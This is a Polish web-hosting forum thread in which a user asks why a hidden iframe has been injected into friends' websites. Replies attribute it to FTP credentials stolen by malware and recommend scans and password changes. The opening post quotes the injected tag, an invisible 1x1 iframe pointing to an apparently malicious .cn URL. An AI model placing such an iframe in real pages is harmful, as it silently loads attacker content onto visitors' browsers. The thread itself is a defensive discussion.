Skocz do zawartości
Zaloguj się, aby obserwować  
rgt

skąd sie biorą nagle wstawki iframe na stronie?

Polecane posty

Witam.

 

Jak sądzę znajomi padli ofiarą kogoś "miłego" i pojawił się u nich w kodzie stron dodatkowy kod z iframe, np:

 

<iframe src="http://lotmachinesguide.cn/in.cgi?income58" width=1 height=1 style="visibility: hidden"></iframe>

Jak zaradzić na przyszłość takim sytuacjom?

To "wina" firmy hostingowej czy wina samego skryptu? (jeden przypadek to sklep z shoper.pl)

 

 

R.

Udostępnij ten post


Link to postu
Udostępnij na innych stronach
Gość Active-Hosting

Poczytaj o wirusie przechwytującym hasła z TC przez złe szyfrowanie TC.

Zmień klienta FTP i poczekaj na nową wersje TC.

Udostępnij ten post


Link to postu
Udostępnij na innych stronach
Gość RuFiK

1. skan komputerów ktore maja dostep do konta hostingowego

2. zmiana hasel na ftp

3. zglos do boku w celu wyciagniecia szczegolowych logow

4. glowa do gory ;)

 

ps. jak nie piszesz komunikatu ze google blokneli www to jeszcze jest gut sytuacja :D

Udostępnij ten post


Link to postu
Udostępnij na innych stronach

Czyli to raczej wynik dostępu do ftp (przechwycenie hasła)?

 

R.

Udostępnij ten post


Link to postu
Udostępnij na innych stronach

A co jeśli Google już ma na swojej "czarnej liście"?

Udostępnij ten post


Link to postu
Udostępnij na innych stronach
Gość RuFiK

sprawdz skrzynke mail admin@domena google z automatu wysyla powiadomienie i jakie nalezy podjac kroki zeby bloka zostala usunieta.

 

pzdr.

Udostępnij ten post


Link to postu
Udostępnij na innych stronach

Moze to tez byc wynik tego, ze strona nie jest zabezpieczona przed atakiem HTML insertion i ktos wrzucil HTML do bazy danych ;)

Udostępnij ten post


Link to postu
Udostępnij na innych stronach
Gość RuFiK
Moze to tez byc wynik tego, ze strona nie jest zabezpieczona przed atakiem HTML insertion i ktos wrzucil HTML do bazy danych ;)

 

watpie ... mialem statyczna strone i bot podmienil mi plik index.html .... via ftp :P

Udostępnij ten post


Link to postu
Udostępnij na innych stronach
1. skan komputerów ktore maja dostep do konta hostingowego

2. zmiana hasel na ftp

3. zglos do boku w celu wyciagniecia szczegolowych logow

4. glowa do gory ;)

 

1. ok

2. ok - dodatkowo: nie zapisywać hasła

3. do niczego się nie przyda

4. a nawet wyżej

 

najprostsza metoda na pozbycie się wrzoda i w dodatku skuteczna :P

Udostępnij ten post


Link to postu
Udostępnij na innych stronach

Antywir: http://download.eset.com/eval/win/eav/eav_nt32_plk.msi Napisz na PW a dam licencje do 23 lipca ;):P

 

Wykrywa ten shit.. Jak usuniesz i znów podczas przeglądania Nod da komunikat o wirusie sprawdź jeszcze raz ..

 

Ja miałem tak że pododawał się 25 kwietnia (w Total Comanderze data edycji .. ) usunąłem ( był backuz z dnia poprzedniego)

 

I po 2 dniach znowu komunikat jak do PA wbijałem no to hmm lukam a tu plik miał to wpisane nie 25 kwietnia a 14 + nie na końcu a pośrodku .. :)

Udostępnij ten post


Link to postu
Udostępnij na innych stronach

Moj kolega mial identyczny przypadek dodany wlasnei podobny wpis. Antywir , po wejsciu an stronei wykrywal ze na strone jest robak

Wystarczylo

Przeskanowac komuter skasowac kod na stronei zmienci hasla do serwera ftp, od miesiaca jest poprawana sytuacja ;).

Udostępnij ten post


Link to postu
Udostępnij na innych stronach

Za każdym razem jak skończycie coś robić na FTP wejść do totala i zmienić hasło na lol ']

Udostępnij ten post


Link to postu
Udostępnij na innych stronach

Udało się wszystko poukładać, nawet z gogle :mellow:

Dzięki za odzew.

Udostępnij ten post


Link to postu
Udostępnij na innych stronach
Za każdym razem jak skończycie coś robić na FTP wejść do totala i zmienić hasło na lol ']

kto jeszcze z tego starocia korzysta, można choćby z fireftp w firefoxie korzystać i nie ma zabawy w zmianie haseł po każdorazowym użytku ftp

Udostępnij ten post


Link to postu
Udostępnij na innych stronach
kto jeszcze z tego starocia korzysta, można choćby z fireftp w firefoxie korzystać i nie ma zabawy w zmianie haseł po każdorazowym użytku ftp
Starocia? Pokaż mi lepszy menadżer plików pod Windowsa... No i jakby umknęło to Twojej uwadze, to Total Commander nie jest tylko klientem FTP, więc sugerowanie śmiesznych dodatków do Firefox'a jest co najmniej bez sensu...

Udostępnij ten post


Link to postu
Udostępnij na innych stronach
Starocia? Pokaż mi lepszy menadżer plików pod Windowsa... No i jakby umknęło to Twojej uwadze, to Total Commander nie jest tylko klientem FTP, więc sugerowanie śmiesznych dodatków do Firefox'a jest co najmniej bez sensu...

Fakt tu masz rację, chodziło mi tylko i wyłącznie o usługę FTP w TC. Czemu śmiesznych?Jest bynajmniej bezpieczny.

Tak to jest z popularnymi programami.

Udostępnij ten post


Link to postu
Udostępnij na innych stronach

nie nalezy takze zapisywac hasel w Fireftp w Firefox'ie poniewaz z tamtad tez kradnie loginy i hasla

Udostępnij ten post


Link to postu
Udostępnij na innych stronach
Czemu śmiesznych?Jest bynajmniej bezpieczny.
Skoro jest dodatkiem do Firefox'a, to musi być śmieszny :mellow:

Udostępnij ten post


Link to postu
Udostępnij na innych stronach
nie nalezy takze zapisywac hasel w Fireftp w Firefox'ie poniewaz z tamtad tez kradnie loginy i hasla

jeżeli ktoś nie umie się zabezpieczyć.

 

p : takie tezy to wiesz.

Udostępnij ten post


Link to postu
Udostępnij na innych stronach

Już tak nie idealizuj swojego ulubionego Firefoksa.

 

jeżeli ktoś nie umie się zabezpieczyć.

Jeżeli ktoś umie się solidnie zabezpieczać, to nawet Total Commander jest dla niego bezpieczny.

A jeżeli nie umie - to Fx jest równie dziurawy, jak TC.

Udostępnij ten post


Link to postu
Udostępnij na innych stronach

A czy ma ktos w miare gotowe rozwiazanie do zabezpieczenia od strony serwera? Cos na wzor daemona (np) ktory sprawdza/filtruje dane przesylane przez Ftp ?

Udostępnij ten post


Link to postu
Udostępnij na innych stronach
A czy ma ktos w miare gotowe rozwiazanie do zabezpieczenia od strony serwera? Cos na wzor daemona (np) ktory sprawdza/filtruje dane przesylane przez Ftp ?

 

 

Istnieje taka możliwość, nie mniej jednak wdrożenie tego nie jest proste,

 

a overhead jest jednak odczuwalny, bo daemon musi po przesłaniu każdego pliku

 

 

przeparsować jego zawartość...

Udostępnij ten post


Link to postu
Udostępnij na innych stronach

Bądź aktywny! Zaloguj się lub utwórz konto

Tylko zarejestrowani użytkownicy mogą komentować zawartość tej strony

Utwórz konto

Zarejestruj nowe konto, to proste!

Zarejestruj nowe konto

Zaloguj się

Posiadasz własne konto? Użyj go!

Zaloguj się

Zaloguj się, aby obserwować  

×